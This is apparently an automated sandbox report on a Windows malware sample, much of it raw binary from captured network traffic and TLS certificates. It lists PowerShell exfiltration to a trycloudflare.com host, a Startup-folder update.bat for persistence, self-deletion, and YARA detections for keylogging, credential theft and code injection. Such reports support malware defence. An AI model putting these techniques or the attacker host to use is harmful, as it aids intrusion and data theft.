¨ýÌ^ºÝHlÎª¯UØ6GBâ°îýËÌTõ){µj£çó½¬@èG1ufØq¶00ó ÙâÂÒt¶'¢mh§0 H÷ 0G10 UUS1"0 U Google Trust Services LLC10UGTS Root R10 231213090000Z 290220140000Z0;10 UUS10U Google Trust Services10 UWR10"0 H÷ 0 Ïn6·+îFSpwî£K r¾#-ÂGÆ\ù=æî3" ÉH¸°bÎôi r}ÞÕ&ÃnÏ~× ÏÆ;£Ú:ÿlV¿ÜéaEäi¼OÉÀaDr Ð+hjbj"Wyi+â$3~vc,]¼Qi~#±ÿvñî¸Xµk5ï¡æH(91Ù§®Ï¼á°MPoLJøÛ}ñãíî1êr=Rß%d¥pªè¨¹GÈ§Z%`oBá×?çðÂF3 æKwv¡h§]ïØ(w5FäbnâªøÌï7~&³£þ0û0Uÿ0U%0++0Uÿ0ÿ0UfiIÔÞÏ$¸0n.0U#0ä¯+&q+H'/Rf,ïðq>04+(0&0$+0http://i.pki.goog/r1.crt0+U$0"0 http://c.pki.goog/r/r1.crl0U 0 0g0 H÷ Næ³ `'ùQMî¸ÁÕ"æÖßæN:;)~Þ ñâÓªD7Â¥ý7©IX1d&eµC×òìT9U:8wá³@'ÏV{T37yðäîÌQ²s!Ã?©¶Ó¤×Òák$ÛäïèTßý.¶n»Z4Pà{J¤ÓÇi9ðÊAË_È]·«o )Õ$§o#»z7÷ê<ðÀXéòH5§DÆ£Ø=¤÷°%¾÷ÿß¾§^³ØøïÅG%,>·4ÉjµPuÒêC¯MîdÒñFt~wFï´ËmÆEz6¹èü§¦z¾{ñÎÂ³ê£PUüP¯¯êÁ®ÎÎÌ«´klã½tpÌ¤úu¢üLVÝ{Ò±.Mø. ¥f« ólqÑÍx ½óÃ;Ä§B¸31åñ%'UP¾? 7ý_ô¢¥kõÏo,æÃulü¿ºä7¾9ÙçF#Üq¶ÃrFÌÑ@ûºS¨\5ä ñ!³hq·^ÛÇü@n²k;1DÚ»@/,TÝ3 ¥Î%õAåHçè@í_§×à?³iD¾äàòµhy]nxqÃuv²g0®x¶Ú3Gf0b0J w½ lÛ6ùê!ÄðXÓ 0 H÷ 0W10 UBE10U GlobalSign nv-sa10URoot CA10UGlobalSign Root CA0 200619000042Z 280128000042Z0G10 UUS1"0 U Google Trust Services LLC10UGTS Root R10"0 H÷ 0 ¶ã¡w;Ü¿>·§@<¡ýù}2qööûèÛ¼j.£Kù+ö±ùÎ±ùÅÞï¹ò£é¼^§ªR«ø#'Ë¤±cÛ×~ð ^ëh¦ôÆZG M3ãN±£ÈlKìü ßd)%#¡´Ò=.`àÏÒ »ÍHðMÂÂz»ºÏYÖ¯°°1ñÁÀß.¦mlµØ~&E=°y¤(&å¨þè<hSî:+ ²àz.uÖë§VdOh®=ÂÀ¼@À\½ö³5l¬PàLÍÓ é3¼R¯2µ)³%´HùráÊd÷æèÂú8fücùùxý{\wúvúìß±yW´½&ïÖÑë »µÅÅU«Ó¬êK)Ì¤2%NñeDÐÎªÎI´ê\|°@{çC«§l£}úL¥ÿÕÃÎKàµØ³EÏvÀí@+ýS°§Õ; ±¢Þ1Ìwêo{>Öß"æ¾úØ2ücQrÞ]Ö½)h3ï:fì&ß×Wex'Þ^I¢¨!¶©±°¥¹ ÚÇlH<@à~ ZÍV<Ñ¹ËKí9KÄ?ÒUn$°ÖqúôÁºÌíõþAØ=:È®z7£8040Uÿ0Uÿ0ÿ0Uä¯+&q+H'/Rf,ïðq>0U#0`{fE ÊP/}Í4¨ÿüýK0`+T0R0%+0http://ocsp.pki.goog/gsr10)+0http://pki.goog/gsr1/gsr1.crt02U+0)0' % #!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0 +Öy0 +Öy0 H÷ 4¤±(£Ð´v¦1z!éÑR>ÈÛtA¸=5íäÿá\_«»ê\|ÏÛä ÑWò&o[¾Fh7okzÈÀ7ú%Q¬ìh¿²ÈIýZÊ#¬+ëIju×ÇÞ²ÉXHW5¡äÖýooïÏ¯ÀðõNi -áh¸Á+séÔÙü"À7fIíUgá2×Ó&¿pã=ôgm=\|å4ã2ú§njo½îKè;©³7çÃD¤~Øl×ÇFõçÕ!¾fUlÔ)² Áf[âwIH(í×3rS³5ÏbÉ$¥·9»~A¿RÏü¢¶Â?
Data received	K
Data received	GA¿sºÞJÃ!7 p»Ó0ªÅ:°>Åg7>TÛº³>£õb0aÖ$uà%ÂQÚüýÖDZ%PÖÌ;ÆÚÕVpFó"Wrt¦ßÒßò¶Ko^×edútrjÂ¶Xf²´Û,©íè1\ëX9·F+?ãÔzXzr\~ {9×(BAÁuÈéC_^ÛC]ÐrÃÄ7Ë1KZ-^¸'y8Çá~QB÷]g`zÑÌ/¬%Óï;1R{¥Ùõù(îRï¬/µá½~q#t¹^ í¡Úáj8üòiîä~î+ÙF:Qâä%£®+!ìõfy{¥õy6!áJvfÀß!egk¥O¯×PfÄ±Ã Z$Wßzãß.ÿ¨QÍÿ/ä¬\©¥plôáNã
Data received
Data received
Data received
Data received
Data received	0
Data received	]=lI9æUtÁë$pðý~µõ\: e¬wäa¸\(ïÂ@L\|ËÈ5,t:
Data received	p
Data received	3,}ËÓÓ=EÂàNôkÉ®ÏÍ8ÎºXúM¹ï±>?éâU¤øF%ñô[:þåðÂÿCt¿Ý÷Âi÷± î:Ø LÎú)¥aªÙøÄ~:±÷-úzªó¤/e¹î}0ÒÍ£QÌÉ "Ì®tááòô¦'öRgÚj ¿Jþ¬É<e¬òÿå÷Öô&R'p5«êI_Èò9yÑm1¦þn>ú\|¼ãØ<Ò]âq¶Ã¿XÅ?ó[$'@ü¤a·DÏ Èk =¾µ&0bfã:,Æ3ØQràÝBì7!V²<«ïë<ø¹àÃÆÞë¸òjðwTö Äg/ù &ö$D 'rþËSfD^øWeTëíô8í ¦½÷ÝN¯ÿ>%ÏAy÷ñÌ@É%Û<)×"¤bÀíbÓ´ÚÖ1¼leÏ]BÛ¤+S¹c9o:¨TæaÜté'ýlA~<Cõèd¤WDÇ6d6 HÅÐÞg½TÝÈtnß¯Y1¦Iù3=U#z$®úðä3¾ì^"èbÉÞèô´hN«u( Dwô=+-JîL-²ÛßÑÿéÖ$ ¡Wn(Âæl ¢´ý?KÞ¥Ñt·Æºó¾dí¦zxè¯Ã1¶ïåk1ÖÜ"¿¢´ÀÒànihúRÉ±ª½lÚLDÀÏÐrÊØÖs ýå4ÇSÏ×Ë²ÖÕÎvíÕýÂýat£ÔhØ¥î¡@uÍeE¶HÄ±×ä¶ñ\CJZós>ÚÄãg¢§'hÊQ½rO3Õ7ß]ñ©º[u§zT,ÿµÈÖÁú×ö\ù )d!¡qÃHq_ÚBAÚS°Ô5t;¸H8îJn~l\ $o?©íÜ¼<ºæØØ«`ÁJ¿ ·S2=I6³Álfr·Wø@ÿ°¿Îý5GMLNqáZöRj:¼¥&Î^%ÍBÌ$9h7È!ÌuÕõaàz2ì¹6Êª)Å è\¾Po;£üøCµØHú í°zzæ£o 6hË¡O"yCð:ÙQûC2ÅtRÆ©,Ø¼÷xC©X¿<T/:B>Q¬$ÄÁtgÏuHÎI¾^nèL¶ú5~ R8CKÓFB{\HzxÄvM÷bÑ+) å!½ì6fg0Ä¡-Ð×.²Ú¢Ï@K¹G1ãQÓ¯#=OF©HÕì\|åxæHëFYå¢£A\f¯³ò®ô:NæÀµ±NÆ¤89Må¿ïN$=$¦ï>WI÷77 Q6ä}Ö8ý Ozó9%7År²d¼<°o3gAüÓ7áúsIC6«QFÊ0³à#H ]¬yÇ3U× Å[Ï<ÅÞªB6Ýj`Ø:&¥§5qY!yr'R8ÝQ9¶Èßû¸ýv¨Hß6ñ¨[b< Õ±ûl?àHûpáU1£jì¨ü~mÙ#ØÂ-éÙ»É0ôhK)VþrÁO¶Go·ïeB~£ý"_<? þs¶;)?b/¡¢~º¸¾!?;3/Cî\Kát¿ïëx`Ä:kCçÐ¬ Té*'þöUã¦!d¤yË³õå@àG1Ãöàùc"»c¼®~Ý÷:
Data received	êgWï¨¶cãQ³oüª×aT©i)_3=ËÛû ù¹tuûNCU:Å}¢gX}Ì\ñMôÝ>W×-?ñÎôö2Ü£BÁX¶4²=ÃÇ½+iµÆûÜt"¹V°èÉ9c`mÀÁËµÄkHw.¤]áÞà¯ÚÊêµàeÆ¥æ"LÿòGÕ¡ÈûòÜuãÉ[v øbxAuò¨½{¿7%RV©¬õ\ ÅÝDÊ2Õ-ÃÆD°xK.zaº40£å¿ÍåÌqÂ~²K4áhV+³ÔÞ¼§ÌS6_óRí &Ûðÿ»'%ãøÜ7÷jæZSäaí!b×SÛ¼jf²fVjyN{/$ :/æpöþ7\ü§gl"ìÈÉÿéHÐply·#ÀH°«Ï¡!«HJd¯0 (Í½ëNÎ¤aZR¢F¦1!P¿¹¾{PÞLã×Æ nzOkEÆÔ2epf¤©÷j ÈÉÀ~ÉþÎÎ²ÄÂ&É¿ZáÐo,1íZÄËò¿¶.s47þ3¶´×>k^Ng»ZðR¿ÂOhPñ©¿T¸-í90SÏj»E%-g»ªyLºQØÕ¶ ®Ã&¹ºÐ1Ç!Â\|é^ÑËtÕ^ A4¥ÀÕl`=Í¡k_ãOSp=IÛ,=Pö¿`7£èæ`0àöM½ ¹wgcS$mÄ¸`4`?ù½ãÎÂÕ5Íòôa×iâîVôfrSP{AFóÒû&Øàwo³Á~ãÅómc{yyò8±6¸æ:Ï×w_.@EyJ¤ èoßDJ5Pvº²5ÎB)ö94q%t¿ºvxHçÎª£ÞM®H1ªb÷ùöòTîU&³ÝSÚõBÙØÈ E¨û¹l°ÁßÌÐ$ Û8²EÚ'EF~Ï_uKk1ÄIå3bÛ¦p»X°Û¦}ÆuÊ!¸ejåå´,Z@ü^ðÁ\|Yi÷¨ó×2 õUÌÚ;_ìÐ3E%Æ,îNn®_KRu2v¥k¾È&¤Cngvçñ!aj¸öai0¯gb¼V+Mhó?7jãì(æÙ,u { ¯xí][§k¦=XUöWoíL5CûbfcuvC)ÄÃÏ2¶<§0<0êË4¡_©SCÒøõ>PÚz»{¯@U/^öÈ 4ö¾ÈÎ?£Z±ýàò~k 3W[d¥)xÍ"§Oªâ-í2? þ¦w£?4)Q:ÈO]»)ÖÐàr-K «Ø»:>õÇ,"Lc.FZìýéd¹ÂÃn?2ÝÆú P¶6?=Ê2;÷S0M 9ôöR8ÍÑ`T°¸jòàòFM)8´à¤H÷LÝLu {pº0ða°óK@Ñ't¸ÛÝp =uG²&íÃ¬Í½·8[LBBø-Û¡0y{&rýX }5×<¶3`u²+Ü£s+ºÒ_?ªFg 2»ÿh"ðf#¹rªDØÂlÊ0VÛ:Re3Ìl*¿í¥À§RéÔI¸Ì¥&º]vMñ?#[éÉD<a8á.d´WKk[(rÉ?t×ø»ó!òÊ4X¯Ê~øÃþfÂ·ýáªQ¬ÄíÆ}>yk _E§fÃÏ´vªÒåvÝÌ
Data received	S±kGQpÙW&JÉ×ç·"æ ú¡ºïEøå< ò®)µªQ1¡Ý·o¤ÃÀj1åf`8 ÏÎWöx-ëª]¯aáCÇ½÷$§ö°ôÓ¿e»åj¿`¬F r]`£ÃºÎê®RJ=N²9Í.F5ÿJ3ä/$:J¦'§Ü¡dl. KÝZP'èSÿÌ¦ÇÊ;kÐ¼Cñ$ÜYÐ¼ÿ\|®ls@l¨¶Ù;³þ&I>=Ès©(õ!¸`kVa3oÀA:j7GÒMÖDz7_.ãàðÔÏÐí\|ýNã1 5%ÛÒkñµ¥xIH$.N%Ï5e¢~!ÞÄ·¥tòzªÐ[WCjÕQ¥h ùå"5sEìÿ@_Ùµ÷m½ÇJ/¸xMbtU¤Èo0Ñ£æu¥Ôt¤TTÕg&PM'O<ú¨#s G°±©Ø<ªº[SÅTêÍó>À?;úN¥ÖçeãCðiawÖv7ÔùÁ½Mù<Àî¡û`®]ä\×ÆÁò{ÆÔÞ~Ùyú×ãû1<54¢d[¨Fü[´þúîUÇXIvtuäÆ}ö¥ÍCsè/ÂWì¼ÊT>Ðg³ ÙBßcÊ¾nÁ{]²>áâaÐÎ)}ìmS#ÒrAzñ³à#ÈBÉÜt¸%îîo_ws(ü©\|Ð[~PÁT½ ÿ¦&í¬¦Âº6AÉ{eÝQ·^ÎM°³5l.Ú²vNÕHµ]ô;Ö573Âgê<}éÏÔE(#ô+êÀ.å5m´ØòÝõÿ{õ¹:L#Æ-oI6aëËÀQnÍÄ½)BÏÎsÛ3üx!ù·iKDmäo®skXsÍf¼ Ó§êYX2¾U[i¸R6ýÛ@'<%7SyE)1aX RmûFÃ¼üsëXÀ"¥´¾e·Êä2ôü w¶`¤!s¥Ì\|`èX§)GA\ÞJÉ¦¿¯ëE<FM$Òõ¸^®46ú_ð2A?V0ò1ðÊPF[¡Ô÷È6õ^&SOàD'-nö^{doÎ©nnÁ)ZéÂîä»Öú¦Ùét%?b¢¦ã$õ¥}µÝñP¢ÆÆ¢{p¾æ¹Ø¸ªõ§Ã mØ°y°N+_ Á>÷ò$:Æ\|Øóxh¤hZ·ó\¼]2ùû/Ü~²¦èöêç=Î9AÂY(ªf²¢ÞzÿlüÙ:Ö¡êÜ(ûp] <ðï!¬Ò.Õ#¥9D\|ðKGÄ2¦JLÝHÆoÕFªã8z#ôï:JBf±W7´Îí %CÖ(o?5, ¥±c@Å2pÄÝÛTç¥ÉGa>ZVW:âù<ªýðª6ÏÕçïõr<íDèxßå¸ÀÑX5>Ñ{¿£?³«DNÂå^¿ÝÝ<æÒßE:`}ì-¯Ê¤1zá0Êz¡ !Ç³©ß?âu{ÿºÄxK!ß {m¼Üby\|3_;IÕÀ«qïKõHöDÇkÊ%~ÈO¥$o@çáuÆXåÇR³³Þå¢[álÞÆÖ@V«·ÿÖ=Õ%\|ÎTYPG»!ýô¡]¹G}¸F;¹\éf¿804Ü
Data received	ð
Data received	{Ï¡5nÉ9Sãz«÷âHÁ'80¶H®UÚ¦ª¢\|¨5v¿ø-¿l]À!)ãVmBÈg§Lk ØðjTZÀIoÙp_Ò7ÝDv`Üd0\|ºÇ¿¨Lº¶ àÅÑ´úåhLïaQåá¹æp¸~Ó'i_Ä^mOzKLÛW&ßo¹ë¼\|ÄþHÛü¸?gëÿ âÃ°Pñ.l.òR>ô¶^uÅ2/ò[G>§NýëEQíðakNñ-ÍT¸»uÅiÏç]¾X"¬~DÄë>ØÔÿauk:Äô§ØÞåÝR,Úä6ÁdÄ\|Oné ¾n¹¥BzjXÖVÆhL Ó¬ dÎÂã6T¥î®¡0º©÷1ÇbÂ_r¼BºÀPiå¥¯àµm£¸Â#yNôy:/×<$.kw5²s7EO5þºÚù8]²¦iÖiü«¹Ã°öÅEØE/fÑ"FÅ×ÈPö¦ñYØ©áÈi"*Â4ßçÎáoÌéjõîÙÂñÝÂ¶¸645(${>=S\¦ûóÁ ÃëÎÍ¯Ê_É¾[){Ç+v!5ù

Poweshell is sending data to a remote host (3 events)

Data sent	hâÔ'k--îR2ìaûÕd¼-¬kRñ«[¡ì/5 ÀÀÀ À 28Oÿ641minutes-amazing-curriculum-maui.trycloudflare.com
Data sent	FBAäo_ªÓi^ïraÜ!`$§Á Y´¤^©ÑÇîÆÃIaF(ÉF@1ú¿vqrz +ÌÞò²u!0 ÜÌ-÷ÆÍ¾ºÀOÅ`Ä}³Ú{.¡,ÂxùPçâÑ6÷ SÖ}ÆQ
Data sent	*1dm[¤Ú+J@Ù3EC7§ÙvmóÊäóþ]4U¾ã2L--wLÒ[ÙU7VÿGSÒ BU}g÷gæzµC$5QÑ÷µ óÔý//¸YÆ?¼R40ÿ"êKi§ø·ã³Âò-ÒKÞ"\@éæoÍ¸¼Me'A"\o£

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 4, 2025, 12:45 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Installs itself for autorun at Windows startup (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.bat

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send May 4, 2025, 12:45 p.m.	buffer: hâÔ'k--îR2ìaûÕd¼-¬kRñ«[¡ì/5 ÀÀÀ À 28Oÿ641minutes-amazing-curriculum-maui.trycloudflare.com socket: 1420 sent: 153	1	153
send May 4, 2025, 12:45 p.m.	buffer: FBAäo_ªÓi^ïraÜ!`$§Á Y´¤^©ÑÇîÆÃIaF(ÉF@1ú¿vqrz +ÌÞò²u!0 ÜÌ-÷ÆÍ¾ºÀOÅ`Ä}³Ú{.¡,ÂxùPçâÑ6÷ SÖ}ÆQ socket: 1420 sent: 134	1	134
send May 4, 2025, 12:45 p.m.	buffer: *1dm[¤Ú+J@Ù3EC7§ÙvmóÊäóþ]4U¾ã2L--wLÒ[ÙU7VÿGSÒ BU}g÷gæzµC$5QÑ÷µ óÔý//¸YÆ?¼R40ÿ"êKi§ø·ã³Âò-ÒKÞ"\@éæoÍ¸¼Me'A"\o£ socket: 1420 sent: 149	1	149

Creates and runs a batch file to remove the original binary (1 event)

file	1ac0249a4c6ed5f3_update.bat

Creates a suspicious Powershell process (1 event)

value

Uses powershell to execute a file download from the command line

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

de.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All